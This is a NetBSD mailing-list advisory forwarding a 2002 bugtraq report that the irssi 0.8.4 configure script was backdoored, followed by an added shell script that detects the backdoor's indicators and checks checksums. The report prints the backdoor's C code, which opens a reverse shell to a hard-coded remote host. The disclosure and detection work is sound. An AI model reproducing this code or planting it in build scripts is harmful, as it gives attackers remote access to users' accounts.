Subject: irssi 0.8.4 backdoor
To: None <tech-pkg@netbsd.org>
From: Jun-ichiro itojun Hagino <itojun@iijlab.net>
List: tech-pkg
Date: 05/26/2002 01:16:52

	as reported on bugtraq, irssi 0.8.4 contained a backdoor in the configure
	script.  if you still have the irssi binary installed, i'd suggest you
	remove it at once, as there can be other tricks in the binary.

itojun

------- Forwarded message (message/rfc822 attachment) -------

Delivery-Date: Sun May 26 00:07:55 2002
	by coconut.itojun.org (Postfix) with ESMTP id 3A5764B22
	for <itojun@itojun.org>; Sun, 26 May 2002 00:07:55 +0900 (JST)
	id C009B643; Sun, 26 May 2002 00:07:54 +0900 (JST)
	by sh1.iijlab.net (Postfix) with ESMTP id 5A8B463D
	for <itojun@iijlab.net>; Sun, 26 May 2002 00:07:54 +0900 (JST)
	by outgoing.securityfocus.com (Postfix) with QMQP
	id 995FDA30A7; Sat, 25 May 2002 09:06:15 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Message-ID: <3CEFA67D.76933B37@webtech.se>
Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin Östlund <martin@webtech.se>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: irssi backdoored.
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hi readers.

I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client, for those who didn't know).

"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found in configure - it forks a new process, connects to
some server and gives stdin/out/err to it (i.e. giving remote access to
your account):

        int s;
        struct sockaddr_in sa;
        /* parent exits at once, so the configure test program appears to
           finish normally; the forked child carries on below */
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
        /* HP/UX 9 (%@#!) writes to sscanf strings */
        /* (the comment above does not describe the code below; there is no sscanf) */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);                        /* IRC port */
        sa.sin_addr.s_addr = inet_addr("204.120.36.206"); /* hard-coded remote host */
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        /* stdin, stdout and stderr of the child now go to the remote socket */
        dup2(s, 0); dup2(s, 1); dup2(s, 2);

Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."

  - End of quote.

Take care,
Martin Östlund.
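A defender-side check along the lines of the grep advice in the quoted post, added here as an example (it is not from either mail, nor irssi's or NetBSD's own tooling): it scans a configure script for the indicators quoted above and compares a distfile against a known-good SHA-256. It assumes sha256sum (or shasum) is available; the sample configure it scans is constructed from the lines in the post.

```sh
#!/bin/sh
# Added example, not part of either mail: automates the two signals the posts
# describe, a distfile checksum that changed and socket code inside configure.
# Assumes sha256sum (coreutils) or shasum; the expected hash comes from your
# own known-good record (distinfo, a mirror you trust, a prior download).

# scan_configure FILE: print suspicious lines; return 0 if none, 1 otherwise.
# The post's own test was `grep SOCK_STREAM configure`. A dotted-quad literal
# handed to inet_addr() and dup2() of a descriptor onto fd 0/1/2 are added
# here because a generated configure script has no reason to contain them.
scan_configure() {
    hits=$(grep -nE 'SOCK_STREAM|inet_addr\("[0-9]+(\.[0-9]+){3}"\)|dup2\([A-Za-z_0-9]+, *[012]\)' "$1" 2>/dev/null || true)
    if [ -n "$hits" ]; then
        printf '%s: suspicious lines:\n%s\n' "$1" "$hits"
        return 1
    fi
    return 0
}

# check_distfile FILE EXPECTED_SHA256: return 0 on match, 1 on mismatch.
check_distfile() {
    if command -v sha256sum >/dev/null 2>&1; then
        actual=$(sha256sum "$1" | cut -d' ' -f1)
    else
        actual=$(shasum -a 256 "$1" | cut -d' ' -f1)
    fi
    [ "$actual" = "$2" ]
}

# Stand-alone demo on a constructed sample (not a real distfile): the lines
# quoted in the post, dropped into a fake configure script.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' 'int s;' 'struct sockaddr_in sa;' \
        'if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {' \
        'sa.sin_addr.s_addr = inet_addr("204.120.36.206");' \
        'dup2(s, 0); dup2(s, 1); dup2(s, 2);' > "$d/configure"
    if scan_configure "$d/configure"; then
        echo "configure looks clean"
    else
        echo "configure is suspect: do not build, re-fetch from a trusted mirror"
    fi
    rm -rf "$d"
}
demo
```

A hit on SOCK_STREAM alone is a lead, not proof, since configure scripts for network software can legitimately probe for socket(); a hard-coded address passed to inet_addr() next to dup2() onto fd 0/1/2 is the pattern worth treating as a compromise.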
